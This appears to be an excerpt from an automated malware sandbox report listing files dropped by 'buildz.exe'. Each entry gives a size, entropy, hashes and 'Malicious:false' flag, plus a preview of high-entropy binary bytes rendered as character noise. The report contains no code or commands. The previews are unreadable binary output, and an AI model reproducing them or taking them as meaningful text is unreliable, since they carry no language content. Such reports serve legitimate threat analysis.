                        Preview:BQJUWI.......=.I=%=.R...'3...rS..d...L.........W.N.3D.e(..q2..'.Dd".F8>.......'...&r.O..;.(.q...3...tlQ!.{. .%(L%3n`..Y..*../.b..w.X#....%.c...+s.....$..6.DR.A.?.-V}b/..W.d....I.....8w.&.=w..O.(f!...Or..B..w ......3.....fNQ.*.*.3........0....HMEY...v.Z..t..N..1l.i...-.;.Qy...Z4..F,..`...v9A..*...U?.>W...I.....!y.:Yl*h.n..8?..x.i...E.;.[Tc...YV.K...9..9.=..o..VV....8Gg....w...8')....5.....x.$...:.....-.4...G.Z.t.^jA..Q;O.8...j.O..e.:.l....((..'..G..x.Y.9m.ke. ..p...m/.....A...1p:....V.N&......,..{.\..b.li. ......5l....;.......-.=..o...W..H.)'....m../`/.=."...5...,.1X...n........C...)..... Co.:+.._.....`..5.....;.qI.f.v...H..O'..A..y...=p;..jz.....d..z.J.:."E.......F$.......}.L5'.L.$0}....\G.0.>.{.ErD.`/K.{4..8av3.7.EV...7.).....#$...b..>.1.T..a....6..1%..m.....2....I.."..1cY.^..3....S..)..v..T....{J..FX....2..0.x..]......x.88.....1~.q`P..V.u...;.}.b..k]#..'..`...k9...D.l........o>..{. 'ytv.`.^......k=...Q..!-.w)e..t..(^....c..g..x|...%u..vs4
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.838941610991017
                        Encrypted:false
                        SSDEEP:24:kw0mxdGJb4MrZ9ttD3Dimdqc/eZQgJwhhVFueKAcGWELtb6cO0JA+ibi/LMbifGX:Qmxmb4Mr3zHimdqc/RgJweLAlWEB6cdA
                        MD5:24E6DEA4886EBE38EE1DA9AB827F7D4E
                        SHA1:E5450D3D104380364544E49E706ACCFD7B400A54
                        SHA-256:BBF9155ED44C07CD7FBFD2CC603D1AB61CDF35E5A76235CEDFB1A2F27AB7A02C
                        SHA-512:E1644149DCD50E1C035547AF8DB53F7B709B4BC3A1706147ACEB1E7E729279931F00D569093E73637F40050DAB4F11E85908E62AAE7477207E4B7CDFCF63AF66
                        Malicious:false
                        Preview:DUUDTU...g6..V...O}.C..(..-....i).5l....*.H#.T..B.$ S7Y.\...T..rB..c..b.YA.VP...C.].WZ......<..MZ.......p...J.....l.F..&Xv."..#..]..v..8g..Y.s.j[.7.|.i^...y..}L....w.......:...0....5f...`=..P.;.....w7....o0*.&.....?E`.Uw._>.,.....t.^$..u..;..R4R|.....H...e.)...=..*+.&#+34..1.$ZGc...[w.....x.]jFPI..|e.........\.Q.dc.3.!,.M.F...=g.................S...._..N...^bGDX .~.7g..V+&.5.0=.?....9.<(.,W4....O./...c..Z.Z.Lg.....o.........Qo't..y+P..V....r.....t9.b..n`..;.,....{...,5....t}CL#H..UT'..U<}..JG.hU....dD..{...Ij.?./1......a...9....[r.......m.L.L.g..@$.8..w......j...+....M.)'.....b.O.....4....G..K..T#....V.[s..%D..D6...M...h..<.!VK.........q...,..3.....T4.....8S.yU<O.vxK.qj>...L..`....s.h..)......~.M..a...5..`....7.$..e*.7!..y1............P..!Kw.O..P........!O..h.2V.x...@..U..JH_......<.a..P......N...lT Y..7..4.d..}r.Su..i.gq.]O....j....&..y?B..;V..Fq...h..9.C.l..]..|.a...0.N..=..`v8.b..J.C....q..L.N...C.+.....H2... /()...#)d...dJ.....^
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.842742783264333
                        Encrypted:false
                        SSDEEP:24:ll+wGkBZQthTzT4MTg8PlE4dABgSOk/YXPZkSvS2Xm/JcQNhMmae2CDGPzvGbD:/qkBZQthTxxxdFSngZkSd4tNlae2EEUD
                        MD5:97CD4AB5C0FA7DCD5AA804A33AB1041C
                        SHA1:2A2E91B35C4D83335504E713C45FF06DFA917379
                        SHA-256:DF2E69BD17A297745AAF8624F8267F086F3A27429D72F96B4368922F395A1A16
                        SHA-512:7F8F9518062CC5AE6D0A46C6E3CD10102748D0CE732BD7614E97C248FC698C07B0B67424BBC069B4874D34B3120A99BC432D4B7802DA7F9089E4FC91409FAA33
                        Malicious:false
                        Preview:DUUDTf.yBg....$..9..E.z.....S.U(F5i.....b........k.t.y.W..X..k..sn.ek.&...%..l(+....`.!..E..v4.....X...1s.....e)....*..&...?...cC.mb....b....5.j.....G.}../.BRS.FL.....m.5....{.Pa...B...W~ ..Jx..HHH.......{..'.=M.A.yl...B......3V\C.....kuY......Q..(......1($.8_.....72.w..v......i.{H...{...-.h...F...+..7.'i..OK.JA&rl.s..N......q..W.l....\....C..RW.E..q...0i;..\m...X.b.......,y..M.WY%8l.....AW....b*...2./.?.Q95]c.4{...lcUfWW.].`....5.I....@.Kq....I2.V..km...O)f......rT...@wl..;M....S......=.....u..~....:.....XP.2.........U2@..rBd.n.....+..F.Y!i.,..}g.T@.M.h/.e..^2k.....L.V&/$..kT"..z.{...e.Y.....?.6..p.o?.q..{..p...-.W..q.XG...a...g.cw%H.......n@.#c.<...P1..6.....X.w_.##w..$qO....V.....+.. |.C.........V..6'......R.Jy.....g,XM./..%..WO......:.lG.e.R..:].X{}..Gwc.....>.BY..EIx1Sj..D..:.,>.So.Q...c..0.....(..dn.0W.t..h..;P........(..z6E}/.......'.OwT..0.T....N....=..1.~@.y_^.|.....ul.S.=F.sl...V...v....a.Z.m.}K............'UP.|.c.Z.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.846714345874276
                        Encrypted:false
                        SSDEEP:24:Fa6rsb4DhwFhFnJcM4SnxCVgWnvvGVC4nwo2gI1VUvGzdNKA92rQXDuEfLfiB7GX:FtC4D+FnSMEVDG84nlHIs+zOA8rQTuEr
                        MD5:A3A964AFA1F7F641A0313C5660DAFA14
                        SHA1:C3A1E81E05B467CDAE8CDE17F08E8D2BD072216E
                        SHA-256:9D064B5971BDDC3DE6FE1835B380233FB034BB98020BE8FCFC01C38B4F0F8947
                        SHA-512:B67B2CE1D23AF8112BE385BA9FB5698B526B9D156BF600E08984A1E7956AB538BC32235CC56E1B38FC7A089D59D9FE93BE94ADC3F8BC730EB3351DBD9E40511F
                        Malicious:false
                        Preview:DUUDTXW.2...;.R..R..,.OC....8.B.\e..S......m.Z.....#...e..= ..I..._.jG....x.Y..,.$.....^..]..DP.}uO2..<.6P).+.S&.E"Q.ZAn.|.WM|d.5.R.0..5h.dR....._...=.9.....;.....8.<...T..%...B!D..a......=.5.|P.1..T.X.K:.8......,W.<oc..W.j.V.+.K].u._.U.?.w...M.w.P.'..r....Y_.......!v....{x...-...*..&u>qi.'N.f...3.......g....HW.T.........>..b..&..3..D...7*.......9.^.xl..M.M....0.@.T..w..:..TKT.b.(.......57.W. .cm\4....d.....}.y..SV..."....-.=.;.*..7...*..Z.x..9.>.m.X].....yY.o.:.}.w....`%...Y..Q5.!.jS.t...{...i!.(g.\!..:d..s3..P..[...:.0A&7.],.Bd.l......ki...m....G..(.s..>t.kmDq.`....|w...T`...~.<v..Q_.&-..*.G.:..OFt..[(r.*. ^.E..Q..F.|.#...9nd...-s...A.E.%k..*..S....`.Wu....X....L....#3Jz....9.D....g..C...?"Qx....G.\..EExn....6.....M......=.....p..c.Uut...B......."512.)..m#..'..;..kg.9J...G.q...........3t..43..l...f.&1.w....G..Q....k|..).@|..&...0..L.......BMk....R..T`.I..P.kx...#.....Y-1...........`E.q.PG...ij..R~H....F+TL..+....>...09...].....U.4Of.iJ..<.9 ..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.861008768464821
                        Encrypted:false
                        SSDEEP:24:IILgCeeXeLxpFlCKhDyKGdRq0RoNJnyrwSXyXzZaOsRwMbH4eZNAA6GbD:hLgCeeXeSKF9m00RYNyrwXFa1/ZCHUD
                        MD5:23F39E8635ED6D1BEE9A44971D873804
                        SHA1:5D3BFD9C4F34A4295A462A2409C7606F9F19E9E5
                        SHA-256:BF78BAE5AC921B01E2F1B8BB7D775B5E75771A2D6D707ADFC652B9C5BD1ED17A
                        SHA-512:B446948476B951037AE9B5F79894E403362AA2087997BBE615C48361DB4ED1E437E653B5A706EB726F8134A2DA22D19D1098D4502E1673265C056F45A91EB82B
                        Malicious:false
                        Preview:EFOYF.9...Kg.!.'....[......S.'.s..D.v.^.._[._..{.;~.,...c..........J..I..............G9]...~.s...8..=...y...k.c....z...].6...nx..-..O8%......R.d..x..,.n9"........S,....?|....t.#.!?Z.T...3..*.FuK@......"..6..h..GdM.D>..@~.@.im....J......m#u.$~..P...8$C{....x.$....DyMi[K0.x...V.|>.HD.r...}..Y.)"...#m......V.H......P.I..&\.....4zH.2...+@.s.f.M.y8^.8..........f.-4....4."p...*G.]_..J9/tP..%pU.|........mz.."$..F.`...5.%.)$.;l.I8........"....q:.vz'"~.zw[OP.Tl.M.%.5...a.\.8.eQ-w...@.....J.6o.b9s.v0.(I(vj....N.b..*..m.g/j..t..{.......^E]..*5...0..1 ..Yd..........'|.....h...]....A`........^.......m...aZ~$.i.!fU...C.=.?S...8.......z....D>..n....cg.SE.e.V7>.v...N.....W.{..N-Q....wH{......kz.o.....2.O....'.3.n.....4Z....\.c..e.Id.*@.....`...*.L....?B..n....rn...33..\.lL..[23..[n.Eww.3.....Q....x:.#P..L.....J8..,..%..v.E$..b+..7=E.D]..=..,.ML.(ue....cH...-~NM.d.....V}"...E..t...s."...../N.@.V..!..l..PJ*;.u..'..g%.......Z.u....?...Z....i*^.9.B.{
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.836402775678312
                        Encrypted:false
                        SSDEEP:24:huvKEy4ZSdDgd59wJWD2Gllr9D31XpNlgrLRbqtYKO8QmCnYAxGbD:huvvcdDgp2GLJppNlgxbqt48PCYCUD
                        MD5:E46D473242BE18A792E1AF4B6AAAAB21
                        SHA1:F4370045756016549AE078C47C1B7DED4FC9B95E
                        SHA-256:6DF45D3DA66E187D4164CE819E65FBBA6D68B2298D5E10E8894F7FAF8D7DD460
                        SHA-512:7138C9B93753F9015DF82644468F9D16AC51BB224C38F047816BB4DF9967AC166AFD2BCF4524208665AF3EEDF21D5F52766C2E2B2F4A70C706AB6977924B991F
                        Malicious:false
                        Preview:EFOYF5.{p..l=r.:y>M..;.zf..DPJ..Gk...VAC`....q.9.F 4.f.S4I..j....T~...w`A4..P.-5..4.Zg.ru.D.BS...5-K3...w.L...#F.|H.l..R.JY.V.W.....-.n.P....G|mY$.q...v/{..o...3.I..._.i.IA[..K.4.*r......0p...T........zB..y.4.......,.ZE...zw..'.q...M{......0!.&3..;.I..".............p\^....L+.b]....n...yK.@.......=_..&..N..C?.Y..^-..A&......C.b..C...3E.....x. F.{Gm..@.V...6%.P.6.3..a...~......z.......v...W.......k>K.;.=..C_]'.!9F....&.O.&J...'..Q..4O..aR%K.dv^r.@.[6....\.%...Y..[N....%....C........x..A...#..f.~..Z._....R...N..7..p.....u5:j....8Gw..H.UO..Lkm.O....L...F..0...K.j.*.hR0La.].f...pQ<.....1..V.#G...n~;t../.....pA4.........W..rz..i.s..~m....[-.....AW...S.PQb...K..V.OT6...jc..,...F4+`_......a~.N....X-[nWP..vk.l3...y....(.C...J/...t6vG...Z:.=4.[.i.rYE../6p.K....-'A.Y2...cG..3..4S@zPv...l..w..i..........~..0..j...Q.U)....~.M.@.............h.<..Ph;:?6..<)...@..m...v.....U.......'..R.I.8.xR9@.x..k...k....p>...G....`J...,.Y"eq.^..%(.bK..Q.....4./.X...W,..z
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.85461789300601
                        Encrypted:false
                        SSDEEP:24:R3JFDpLWf9aACkjx36WGM/7JFVrnK5OsqUPAXUoWLyECd2PvQIoGbD:TXLWZt3sM/7JTrnCqUPyzWLRCd2P4IoA
                        MD5:98B92CD9986886A2A0ECA30053981CD7
                        SHA1:1263F1CFDB57339D4DF7B2B5AB2497858D7F55FA
                        SHA-256:AF0C91BFC89DBA062F40D415E4CACA92244D49C3829472B5BC0BD500442EEDE8
                        SHA-512:9D8ACDAF2CAB0ED94B2C9A0BE32DB14DAF012C140719D0CFD5A4251AC77ED1EB770E21A3B0D0C855E738DF446898110438B3AFE6C5BE788A139EE0851A50F20D
                        Malicious:false
                        Preview:EIVQS=.V.pC..m....V..!..4.....@#Pz...e..pET..xQ..UU(..$..m......k...Oz.....j..}+%......./............\ .:^..9........o.s.7...5.}/...1....#}.L.YE.x..h.a.1.....e..E..p.M.Y....Ba jm......@.;..d./.v..H-.....!...`g)..Uam.-.b..n`)....{.......5tA....r.....-.w.rR.A...P<....N.5E3..........fD......{..M.....p.....L.)._{..vH..AS..K.h ....('.........<s...`.\q..b..J,.M.o.....9..~.!.J......0/.#....0.tc8.xF.....b........(M.a";..G..>.\C...X..QZ..f;[...>Y...k*..........u:I..M..b}....^.K.S!.....7.......\..$...AD....bF.z...v)...L....5.W.......I....z.y..i.9...:Z.......L.../....T....MAKb^c...`p+.#.Ig.......=.[%..D.t.}H.<...x..W.........]......._..fe..U"p.5!kr..*.gI..m....s.M3t.H..}.k:m6&..m.-y.V7.k@..K.3H.....b.UR...%$g@tH..`hN..I..d-.....2...SH...';.pk.....n.;..N...'....X......tgUT0T.r..MA4.......fCt.B..JGt|m..3'D.....@.2...j..i.^..yZ..p70eg&!w...n......2[z..$....|...:..X?....S...jE.].thb..k|B..t.V!.}...i..z../..B..IGp.....$.<<...L>Q..K.....i,.N..A
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.859113791562318
                        Encrypted:false
                        SSDEEP:24:RZFKM1LHaH5sn1+vAwvfKngT/dGYXtGcJutn6XaOmmuCOGbD:LF5aS1+vAwHINKJu0KOmmbOUD
                        MD5:BA91AA682055496D9F36E661FE343B8E
                        SHA1:ABD4864DC668676B6F6679026F6FBC4145AD4E39
                        SHA-256:8D32C607DD6F416DC1A589D423DE647FBFDC6F765D07ACB3F61933E133291677
                        SHA-512:25C443D058A6BED348ECD070F971155258366A26A81D118A29028F84E125FC5F10F4E47E7A9ADBF087DAFFD9FB3A932804884C612A3B09B40AEA2D55BADAFEE5
                        Malicious:false
                        Preview:EIVQS......."G..Z2...\...9..Q4...).R....T.....K........}.B.X..Loh..._.}3@.J.$..C...`l.....(..,*...i.c9..Z.'A....")*.c..l}...b.......>...1...j..13.L..9dlDG.+@..u.2u8..Q1.0.S?.k.....(B@..D.......Cz[yg.<......$..6i..I.#..........L;........n7..1t.]l.a......]M...-.N.{.J...#U\....i..74.vF.....#.t-.+.9.oY..U.ea.>..P....<.......f.t<...L..e...3..&....!CU.C......[6.K[..X,....Q.......F...C..[m..]\...t.^.b....Q|p'.q.O.2..t>.!.;..Q.Y(.+0....B....~Qq.N.................@..5..N.G.N...y.....2;..|..W/1\p].b...T...g.../....%*$...%.d......Ex(\..p.G.E..4JWl.SM...{.....-.N.8>.0...y.........R.....}..g.F[.{..../..E]n{IF..;7..C."e}o|...#...4.H...HY.^.X>.;.u~...0....5............-s$K.....o.....}......&...?-"..=...-d....o.?`;....._!..*.Th.S,.{1...|.a...3.....N.r.......[ uB..z.N.S..=...#.../Y.D.6L)..$.{..2Td...{.....lE1_ ...w.p.....l0oR.......zM`..2%.JI..A.<.....4s.W.y..n....o .~(..bu....V...,.R.cK-....h>M.^m*lF.Y..]..O.t..b.J...dS@..#w..K.IN.MMH.Z.~e..e`
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.836878180358455
                        Encrypted:false
                        SSDEEP:24:HqOp8gQBb9eqdOHo8s1j/sNjOGsf4VPnweNvXgaWrbGFa0Hme0oZqXEu1j2/Fqlu:HqOSgQBb9emOI8s17sNKL45L/gZrqF1F
                        MD5:1B1044025E735E9330E017138554A1C0
                        SHA1:040BDA6A4B4A518E41EC49B8A35870F75F044BBE
                        SHA-256:A78EAC32514C52E1B94DC2D72DFD21A79599242341D88D9E8C4C37494168AAF5
                        SHA-512:1EFBA3018B2C84D7886DC3DEFA0107ED7CE1CB3792742759A50BF17CE16FF09537290CFB847CC4D53E56E10628339C59DFBCC67979704E91EE0FA9CCFDFF7CCB
                        Malicious:false
                        Preview:EWZCV...\.?.W*c.....x...j.1.J.U....L\..j......b..R.H....3...\c.......x.......7HY.b~....1...`#.< p.`.7"..(......3}.V<........q.....#.5P.."...H.Z..>y..|........F..!..N.....ggf,H.f.An.?b..'...F.b....H.g......l..M..Rx..........B.?.]....Q.a.>.v..)0.W....RR.....N..U......z...f.......j..t..{.g....r.%.....N............d...N..w.1.... 6a.)n....j@..&g.U..2...h.....,..+G...Qv..{?.|.tA..........p.t.... ..y}Z..2jD..........l|O!....\.oz."....d..$.......n..h.....]5...o.Ez.!`k;-..?j8."n..Bz=.*r..S..[..,.v.H...6..OTwN..UZ;n....{....s.....dL.....<..M.....wb..e..k>..c.I8u.S,...L....-\..H\.*Y0.\O...r.mH..c....9...S.6N..JM..UP ..4{...H.8.Wh...2,..V^.x.@...b..Hs....\...Gp."<.`...bv.?{+.G.......t.6.T..k.Y..5._JY.A..C.A.T.-.....0.l9...M..:.#@CP.....p.......zNPL.'..&,|.w.j\[..#.boG..u.k@.S..w...-&Qns.....2u...@.n..r...>uI..X=.......x..C.?,..=.....h.X...:............qz...v: ...b.Z.$.9.. [.m.9........$@..+o.o.!.y4..ZH...GFY.........S.].P..w..R....WD..F.....|.H...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.852299222827455
                        Encrypted:false
                        SSDEEP:24:1Fw0brsCgQ1UTxtX9DgDV3oUUogw6/9M2NLMgbIvOesaScGUW4y7u/VGbD:n13+XXlgSNc895wAImesJRTj7MUD
                        MD5:7CCCE3152AFEF4EF169A2AEC148B8625
                        SHA1:2E9CCA950B03B38A5100CBBCBC376843EE1F0C43
                        SHA-256:EEE832DAC07F23D9192AA0A564615B17ACBFFD97C8B08852A39143C6A4DB24C2
                        SHA-512:D83A740ECE40012C13CBDE745CC19877DDD24A649D94CFC9614DEF2CF87D1324C405A8193E1494B8BB90C29DE01B89220DAE0C0F1D32D50DC02F9D379E164B76
                        Malicious:false
                        Preview:FGAWO..v.b..........0.2......y.....&*_...p.B.AI.,...[..r.....>}'t..vX.._.....a.....rY...z#y..Y.... O.N.S.$?/.}.:..9.s.....^6]aZ.....HfyS........8.Kz*.\.G.....Tg..=.U.w..w..^a..T^..sG..[r..&.Z.`.j.\.3.j...h.sW...3...[.........8}THU.f..o.....RW.F)Im..l..l.t1".e.......Lx.(...x....v.........#f.;....f#.i..4#...o....s.Cg.L.I..P.u..H@^.......N.c.........$w..q.E.^.=/..p..7:...n...F..;..'.H"..NC..T..w[*.R.........3;k...e../T.r.8....C......v.....e.bP.bi...$.......w.B....h..**./.dr*N.\..F.u.J`4.f...>..._...a.G1.{..5.S.d.g..P.XY.y....ft.U+...{}....X.}G.......o:..g.<.l.5A.U..C...b....=..C..B.>...|.{*.yC.2.&...H..,.(..h....j..6tN.x.!9P.Ze!....]0H...q.:.T.;..%..fG......E.P.SB$5$.z..n...j....%^5..Vhb............&.!......rp1;.W(K.Wr.....E*G.s..ExA......AYU0.{o.jX...s....z1..._*.......=.4...?.\4L.n.....@...b..dc..Z..$.....a.8&.H..`.h...>}.0...k.}.n.y+H..3..'m.&.....3R .b..C.9I_P...]K>....hH...][.G/.F....E.#A.2.jhq.....Av...VY..Z.z.".m.......eB....Y....l...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.828239911347518
                        Encrypted:false
                        SSDEEP:24:nrD7JLpmibL15Bvu22NXvyMfyQrlnR3kXD/JC3gyxIh1IxhKNlCNFk/0AD3sJE7x:v79DHn2NX6M6QrlnejSur4qCNU0ADcJI
                        MD5:BB5D66E02B5E16B363221D87C48E7592
                        SHA1:22B76D112258D8D51CCD79F7A8E4EC3C2A3C4C37
                        SHA-256:7663F19704EFD6EF920747D8C77AE0A9E451110B70366C4EBBBB135A49323BF4
                        SHA-512:A5B2B882A8F5124E287C9405322DD0DB540EA44C784E6FA35ACE937CC8BCD8E4EAF20131E2457757671A3CD42D65C3850111FD38B10ACB540351C9CA579B40D4
                        Malicious:false
                        Preview:FGAWO'...{.[.Z.`........Y...P@..|I.].....0=.@..b...kE....G..I\...C..0.....=..tU.P$........2...Q._.w(_F.W.........".9...f.J[-abFE\]...(..[...p....8..S...U.n....4.{..d0.;...oQ.........@...{._.l'.@.qM]/^J...)GR..3.VP....fR.5I`..+k.F..(......y...+...T_xG...+,.=Hk....-Z;J...P-=S.2....2>......;D.........1..V.h......%K..#.F.Gw6d].`n..r.LV<o..y..P.4..p.........Q.......&#.........M.p(.^.."..<...0......w.....*......#u.2.I8..-.......(S{...]........)r....b.....]..........O!.)...T........TD.....&=...../.o........W......x...0.%{.`...Y...-?*..J....]J...U...W.K.49Ep..&.t..."..r 9.J..P.]..NL..y.Wq....5?....g........./..t...;4W..F.:,\.....p...|.]......D......Y.vk&.n.<..kTw.B......m.........FwgD....U...).vd$..l.`.``.......mq....c.dN.Gn:......w.aY......G.q.1...n....b.v?.X..........U...6..*...%b`.U!..Y..-....D.B'.x.R...(`p...m'..%q..../c.$..1.....{E....-.....9..L" HO..(...}E.tR..!.............G.A.o...#..P....d".x...s....H.B.FIj'..j-........#..[i.=....bl.f.....R
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.862105160670906
                        Encrypted:false
                        SSDEEP:24:pzFg8t7KyQ0jAZ1DBPcZiA3dyzXoVttlPOUffT9DQqMM7GbD:RZ7tQ0sZnQiiyroVT1O2dUD
                        MD5:E34910880324421FF604318031C1F016
                        SHA1:BFFA512A4EA3DC0424882861B06E99D27D716456
                        SHA-256:D300ED48BF42D5F549641D57635EFA1697872283F8DE842DE28D0F89A0C3586D
                        SHA-512:E3D7D659AD74680C75F29A94420BCB65311CCA5970ED1C087058BFF0188C0B0F429FACF38C5E80CF7BCD5438A25B068EC4D7BE732B677DBC881A63FE26C4B70D
                        Malicious:false
                        Preview:FGAWO...i..W.....?d....H..%..%fK.mZ..f.[.:...pQI9r>.~$...h].F.).h.x..R8.\..!$sY1.....9..c...m.8d].!0.......w.....7v.....g#.A.g.H].a...It.`....t..$..{...X.^..'....^...]...<]~?..C..b.5.C![.*..V|..Rv.g..0..R.(`.x.S...l.........$Y...vL..Y..T...cc..^.I..]."GAfY.........D.K......:n.....&.>..U1..B7QW=.XZ.....p......@......i-5y...[|..zs...7^.?ZL...HuX...`}...s. +.f..m.T....|..^.2= .(7...0...)l"..D^.....\.u.V.....;..y.u.\..{.|.(b..s.]..V[L..,Y.2.V.@Q.....n_.?.p.k<..IG.7...\...8.bkQEO..*).....+...Im.aR....9.Z........V.....#.%.gj...'...V........)....6.O.g;....H.;.p4...U..{z.S.th._.Ow.P.Bd.../.f........$|88...]..dc9.F....vQM..xJ.n.R......................knT..#n.##D..:..........r.=......S.a2.y..Y@Z8..?.[&.}.$w(.z..J....T..=.h......B.;...)N..Q..|.EG.ln..m..[..L..2.k.........R#..C...ne$-Z....+g....!..`=B^'o.)...R!-.......<...S...7....x...........p...Zm.F!..4."....)z.,...Fc..p.O..KrF.8.EM..[|...p.....>.p=tYA..ncw..:.E....{..9...Bt......;....5.`Z.i..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.852214924954619
                        Encrypted:false
                        SSDEEP:24:ziMesXvzzdeHKT871ny/rQ2ZauOjJ1Y2cI1IJSdFCgixzGId4hGbD:hesfz4R1nERBM51IrRGQ4hUD
                        MD5:C66CBCB1E755AE7BE54044B24F83F6C5
                        SHA1:669FD1B0632D898287F22DAEB98B9DFBD00E9877
                        SHA-256:55944A53F4C45963E2871FD589A0AFE7D029E08BC3E136B9EEA4C24FA46C0CAA
                        SHA-512:4206B63B7905FBA3C59F46D9ABE9A5A8CCE927B28FD927CC20119D52D0D1F6EB1DB7B32DE0211D33901E085962B536D8AD1FAFA0C9713044DEF65AB17AE02D1E
                        Malicious:false
                        Preview:GLTYD..v....,.Y......mq. Uq..}.....7...n...@]V.U..Gf{'.!..{o.......l/j.YE@D)p....S.b..Mq......./....p........qI.W!....,*..w.r..K9.o..'Y`2&....M....\L..KS.g..8.7....'...H.V....|R..J.P...t}G...*..}.'W5..eW...V...:....Kx..Z..h.U..g.]7C.....x].&ks.L.|..Z.......Bq..`p.:SX.......#.+....#.iU...mH.t@...t.s....4..T.Y.z..8...(..&R..S>^X....[.?4IHdB....k.JG...D.V.C.........N.<.e.;rg.7..4)..:....w.Pq%....c..I...q).5....e..?....A............q..........._.t.G.)j.|....T..\.J..8......D........;....I..L.3I........O..0....v0.Z.=.n...Y&.I...0.......z..,RP.i.B..&+.x(.+./..?..f.,........d...u+..5.......`../..x.z..J.(V>........=u0Y..6.....(^..C.0..1...1.O.>......j.......CV.Rv.E..b../.D....D.@.e..b........O.h<z.#..FY`Dhs..).........vr.w=...w.2..F.I.9-.\.(3i..*..gr....W.;K.p.z...*.Y....Rl["...j....!.c@e?:.*?'.q-X...I.f..)..t...I\4....<.A...ur.b...?...J.vH...#...T..... =/..}..'.........e..-.x...#X....9.y^...2.@...Z".6....N.4....'....f.C...i......:.`\>..M..,.../.
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.838673125352254
                        Encrypted:false
                        SSDEEP:24:/2ei/6KRRmbEVIXwbW76lzoD+j0CfPNQGZx5iBLyM9n1zHGbD:uxRSEVbS7KA+j0Cny0+BbVFUD
                        MD5:9E56D97E5C96DA8A613CB92217AD4974
                        SHA1:387795B66BA83F206533D93074427AEFA2996103
                        SHA-256:5110D1FB5D07D417224D8389772A60E7FBBFC8A3CB753B03C9D2581EF9CB51E2
                        SHA-512:08033BCBC8DDAF3A95C8D0CAFEFB0A3EBE450539C1D75227BF9F4464CC4F306963F9657823B45C149190347DB8A717BB372FDAC88D4A5E9E461EF82C3CAD55EB
                        Malicious:false
                        Preview:GNJEV.U:=...z......K.....Q<w..5.D1...-....UM.y.O.~....8G%.....E.....x...RB!..%...hP.nh[.7...]..z...!.*GYG.$..P.z+.Hz...S..G....`....`.v..*%...r..........f0..Q..#dFw.6......&.Z..V....G..p..~Zu..].....V..h...W.4...l..u.G..R..L}..*..P.@t:+...~....n.N....^...3.....;..d.{.X...jE...@.....&...&B...)...{@.*...F.....p..Iq. .h.s.a..Lj..v......,p.+... ..\bCO/<2.......!....W..H.S.D..<....+...zS....p..wj....M..Xl..H..........o........dn..`.m.!,<.B}.u..s_..Z.W.d.\'..ll..8>...D....*....w......a...........U7.`......@.G.g.....Ot=..r.uX#..}E....J.t".:&8N\.z..^<j....O4RTZi+.A>..p.c/..)$.n..........N.&..g.|..............J+.L.k+.Q.vy.%g"\...>V.....v4.)(..9..r.~.(...........&e.'.$Wx*T.IH.K.)\!u...3.?.....S$.=..D..U.....+..8.I...n.M.h..@..<.7Kk...uH..._..vP....@..Q.g.7Te....1".2.2....FC.r(e^./..)......6r.v....G...T...BD.#.*.a...<@..t.R.e....1....Q..F.]1G2...S......8.t.*..q..p<..,..\...D..... @.u..;..co...-....Kw.._..k. "....%O....L.L....Tu..;....X.C...<...K.....l.z..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1360
                        Entropy (8bit):7.858075317288121
                        Encrypted:false
                        SSDEEP:24:/jmP+3KEYqkpU95sTskdLzKS5rGpabqIUxD6Wk2Me/x86ODuKWVOu4OGbD:bSEYpMsPFFyhHxejkXEuKWVt4OUD
                        MD5:12A2974926A71B323C485D297109E70C
                        SHA1:081C2CFB3D7E6FE759EED9CBB076296F9FE4E72C
                        SHA-256:B213805BCEB2F0E2853F7E23A6475B1E95AD1BB0EB0CD71158F10A867CC12510
                        SHA-512:68B4EB9ED06032450B96D3618739307D6941BAF7275347C18C18960E9570706740C4A33F7B450B3EA82D87026564A7606A359936FE9B775A5D2F66085E1572A0
                        Malicious:false
                        Preview:GNJEV.B.....R ..x..OK.......].g...."K...+y..7J..[..V/..$.,.i.o.<.l.......z<Mx.g.|8..../..Q.v.wB..)ExP..[....Z.,0W5.......0g.A...Y....>|.fV&.g.R.Cc..R..rT......1].._.R..=3...w.B...&|g.. .T....E........(w...W_0W.....,Sa_u.D..$....;.D....ZV....7.`Y..G..._..Y8':....03.....@`.x....../D..+.?..................=Z...b...$.peaB5X......*y........;(+.@X;..%.. u?.../..(w..sfo..g.LPA>EO.M.e.~.q.B,m.D..:.;..V.(..%....T.8.U....S.p..H...H..Y.i..d<.[...R..%H..q.X.P.S|~..i]5...n.U.!.......]...hf..z%.....I..~...J..8....#sl..,..>&...,:3.{..=T\J.$..C8.......G....8..h3.|..;...m....aK7.=.......P_c.[t......<.F..}B...+.j...dd.."..7>w.n..........a.a...|..5.......d.8%.J.,.S......3T%M.f....Q..R#....4..^....d...8....E.u.7....v...Bv=..%4...........6|.i...sQ ,.*1t[.Vg..2.O..QA7$H.n.....T...L......?`..(1X.;.|L.k.ay.D..0...!....._...p..!NH.z...........f*.p....&v~.\.2.f...'.u....v.-.B.gd.*HG,..*..3....QF.E<F....mg...g...#.~..>0r..... 